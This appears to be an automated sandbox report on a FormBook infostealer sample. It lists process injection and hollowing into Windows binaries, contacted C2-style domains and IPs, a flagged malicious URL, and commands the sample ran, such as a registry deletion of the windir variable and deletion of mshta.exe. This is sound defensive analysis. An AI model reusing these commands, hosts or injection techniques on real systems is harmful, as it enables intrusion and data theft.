          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0317740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0317740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0317740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03171074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03162073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03123884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03123884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03178CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03126CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mshta.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\secinit.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kilbyrnefarm.com
          Source: C:\Windows\explorer.exeDomain query: www.delhibudokankarate.com
          Source: C:\Windows\explorer.exeDomain query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeDomain query: www.trendyheld.com
          Source: C:\Windows\explorer.exeDomain query: www.besport24.com
          Source: C:\Windows\explorer.exeDomain query: www.mobiessence.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exeDomain query: www.titanusedcarsworth.com
          Source: C:\Windows\explorer.exeNetwork Connect: 51.83.52.226 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeNetwork Connect: 86.105.245.69 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.215.87.120 80
          Source: C:\Windows\explorer.exeDomain query: www.schoolfrontoffice.com
          Source: C:\Windows\explorer.exeDomain query: www.beastninjas.com
          Source: C:\Windows\explorer.exeDomain query: www.mylifeinpark.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.27.129.115 80
          Source: C:\Windows\explorer.exeDomain query: www.vavasoo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.opticatervisof.com
          Source: C:\Windows\explorer.exeDomain query: www.dragonshipping.com
          Source: C:\Windows\explorer.exeDomain query: www.mypursuitpodcast.com
          Source: C:\Windows\explorer.exeDomain query: www.importexportasia.com
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 2750000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 2760000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory allocated: C:\Windows\SysWOW64\mshta.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory allocated: C:\Windows\SysWOW64\mshta.exe base: 2340000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory allocated: C:\Windows\SysWOW64\mshta.exe base: 2350000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3290000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 32A0000 protect: page execute and read and write
          Creates a thread in another existing process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 2760000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeThread created: C:\Windows\SysWOW64\mshta.exe EIP: 2350000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 32A0000
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10410000 value starts with: 4D5A
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory written: C:\Windows\SysWOW64\mshta.exe base: 10410000 value starts with: 4D5A
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 10410000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: unknown target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: unknown target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\logagent.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\logagent.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\mshta.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\logagent.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\logagent.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 260000
          Source: C:\Windows\SysWOW64\mshta.exeSection unmapped: C:\Windows\SysWOW64\reg.exe base address: CE0000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10410000
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2750000
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2760000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory written: C:\Windows\SysWOW64\mshta.exe base: 10410000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory written: C:\Windows\SysWOW64\mshta.exe base: 2340000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory written: C:\Windows\SysWOW64\mshta.exe base: 2350000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 10410000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3290000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 32A0000
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\System32\mshta.exe
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\mshta.exe'
          Source: explorer.exe, 00000008.00000000.413574464.00000000083E7000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.863617047.0000000003540000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.464624457.00000000008B8000.00000004.00000020.sdmp, rundll32.exe, 0000001C.00000002.863617047.0000000003540000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.387156048.0000000000EE0000.00000002.00000001.sdmp, rundll32.exe, 0000001C.00000002.863617047.0000000003540000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000008.00000000.387156048.0000000000EE0000.00000002.00000001.sdmp, rundll32.exe, 0000001C.00000002.863617047.0000000003540000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScripting1Registry Run Keys / Startup Folder1Process Injection912Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1DLL Side-Loading1Registry Run Keys / Startup Folder1Modify Registry1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection912NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonScripting1Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)DLL Side-Loading1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 458655 Sample: Form_TT_EUR57,890.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 91 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->91 93 Malicious sample detected (through community Yara rule) 2->93 95 Antivirus detection for URL or domain 2->95 97 6 other signatures 2->97 10 Form_TT_EUR57,890.exe 1 24 2->10         started        process3 dnsIp4 77 sn-files.fe.1drv.com 10->77 79 pxqklq.sn.files.1drv.com 10->79 81 onedrive.live.com 10->81 57 C:\Users\Public\Libraries\...\Fdhlajk.exe, PE32 10->57 dropped 121 Writes to foreign memory regions 10->121 123 Allocates memory in foreign processes 10->123 125 Creates a thread in another existing process (thread injection) 10->125 127 Injects a PE file into a foreign processes 10->127 15 logagent.exe 10->15         started        18 cmd.exe 1 10->18         started        20 cmd.exe 1 10->20         started        file5 signatures6 process7 signatures8 129 Modifies the context of a thread in another process (thread injection) 15->129 131 Maps a DLL or memory area into another process 15->131 133 Sample uses process hollowing technique 15->133 135 2 other signatures 15->135 22 explorer.exe 2 15->22 injected 26 reg.exe 1 18->26         started        28 conhost.exe 18->28         started        30 cmd.exe 1 20->30         started        32 conhost.exe 20->32         started        process9 dnsIp10 71 www.f9fui8.xyz 22->71 73 www.dragonshipping.com 86.105.245.69, 49762, 49774, 80 TRANSIP-ASAmsterdamtheNetherlandsNL Netherlands 22->73 75 20 other IPs or domains 22->75 115 System process connects to network (likely due to code injection or exploit) 22->115 117 Performs DNS queries to domains with low reputation 22->117 119 Uses netstat to query active network connections and open ports 22->119 34 Fdhlajk.exe 16 22->34         started        38 Fdhlajk.exe 16 22->38         started        40 rundll32.exe 22->40         started        46 4 other processes 22->46 42 conhost.exe 26->42         started        44 conhost.exe 30->44         started        signatures11 process12 dnsIp13 59 sn-files.fe.1drv.com 34->59 61 pxqklq.sn.files.1drv.com 34->61 63 onedrive.live.com 34->63 99 Multi AV Scanner detection for dropped file 34->99 101 Writes to foreign memory regions 34->101 103 Allocates memory in foreign processes 34->103 48 mshta.exe 34->48         started        65 sn-files.fe.1drv.com 38->65 67 pxqklq.sn.files.1drv.com 38->67 69 onedrive.live.com 38->69 105 Creates a thread in another existing process (thread injection) 38->105 107 Injects a PE file into a foreign processes 38->107 51 secinit.exe 38->51         started        109 Modifies the context of a thread in another process (thread injection) 40->109 111 Maps a DLL or memory area into another process 40->111 113 Tries to detect virtualization through RDTSC time measurements 40->113 53 cmd.exe 1 40->53         started        signatures14 process15 signatures16 83 Modifies the context of a thread in another process (thread injection) 48->83 85 Maps a DLL or memory area into another process 48->85 87 Sample uses process hollowing technique 48->87 89 Tries to detect virtualization through RDTSC time measurements 51->89 55 conhost.exe 53->55         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Form_TT_EUR57,890.exe20%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe20%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.logagent.exe.10410000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.logagent.exe.10410000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          29.2.secinit.exe.10410000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          26.2.mshta.exe.10410000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          26.0.mshta.exe.10410000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          29.0.secinit.exe.10410000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mylifeinpark.com/6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8100%Avira URL Cloudmalware
